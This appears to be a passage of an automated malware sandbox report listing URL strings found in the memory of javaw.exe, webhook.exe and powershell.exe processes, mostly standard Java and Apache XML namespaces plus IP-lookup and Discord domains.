Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-binder
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-context
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver:
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/symbol-table
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/symbol-tableQ
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation-manager
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation-managersetBF
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factoryam7
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtd
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtde:
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/validator/schema
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handlerm
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handlermPrm
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/locale
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/localedJ
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocation
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocationetPubl?
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocation
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocationdK
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/security-manager
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/security-manager7
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-element-declaration
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-element-declarationsion
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-type-definition
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/validation/schema/root-type-definitionr(
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/w3c/domD
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypes
Source: javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypesk
Source: webhook.exe, 00000003.00000002.1391090423.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org
Source: webhook.exe, 00000003.00000002.1391090423.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.orgd
Source: javaw.exe, 00000005.00000002.3694422563.00000000099DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: powershell.exe, 00000008.00000002.1875355279.0000000002A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: webhook.exe, 00000003.00000002.1391090423.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://discordapp.com
Source: webhook.exe, 00000003.00000002.1391090423.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://discordapp.comd
Source: webhook.exe, 00000003.00000000.1224355173.0000000000632000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: javaw.exe, 00000005.00000002.3694422563.00000000099DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/jaxp/xpath/dom
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/jaxp/xpath/dom2
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/dom/properties/
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/dom/properties/(
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-check
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage4
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSource
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/schema/features/
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/
Source: javaw.exe, 00000005.00000002.3694422563.0000000009FCA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd
Source: javaw.exe, 00000005.00000002.3694422563.0000000009FCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-state
Source: javaw.exe, javaw.exe, 00000005.00000003.1360100051.000000001528E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3302081083.0000000015294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1355684652.0000000015204000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3698035742.0000000015292000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1558573934.0000000015294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358921734.000000001525E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1510520893.0000000015294000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-stateml.FXML
Source: javaw.exe, 00000005.00000002.3694422563.0000000009FCA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com/xml/stream/properties/report-cdata-event
Source: javaw.exe, 00000005.00000002.3694422563.0000000009E4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javafx.com/fxml
Source: javaw.exe, 00000005.00000002.3694422563.0000000009E4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javafx.com/fxml/1
Source: javaw.exe, 00000005.00000002.3694422563.0000000009E4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javafx.com/javafx/8
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing8
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/$
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD?
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchema
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalStylesheet
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalStylesheet0
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.dom.DOMResult/feature0
Source: javaw.exe, 00000005.00000002.3694422563.000000000A45D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A286000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.dom.DOMSource/feature
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.dom.DOMSource/feature0
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXResult/feature0
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXSource/feature
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature/xmlfilter
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature/xmlfilter4
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stax.StAXResult/feature4
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stax.StAXSource/featurep
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stream.StreamResult/feature4
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stream.StreamSource/featurep
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stream.StreamSource/featurep3
Source: powershell.exe, 0000000E.00000002.1569667902.0000000004FA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: webhook.exe, 00000003.00000002.1391090423.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1903364315.0000000004838000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1429649555.0000000005454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000E.00000002.1569667902.0000000004FA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1712907932.00000000075B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
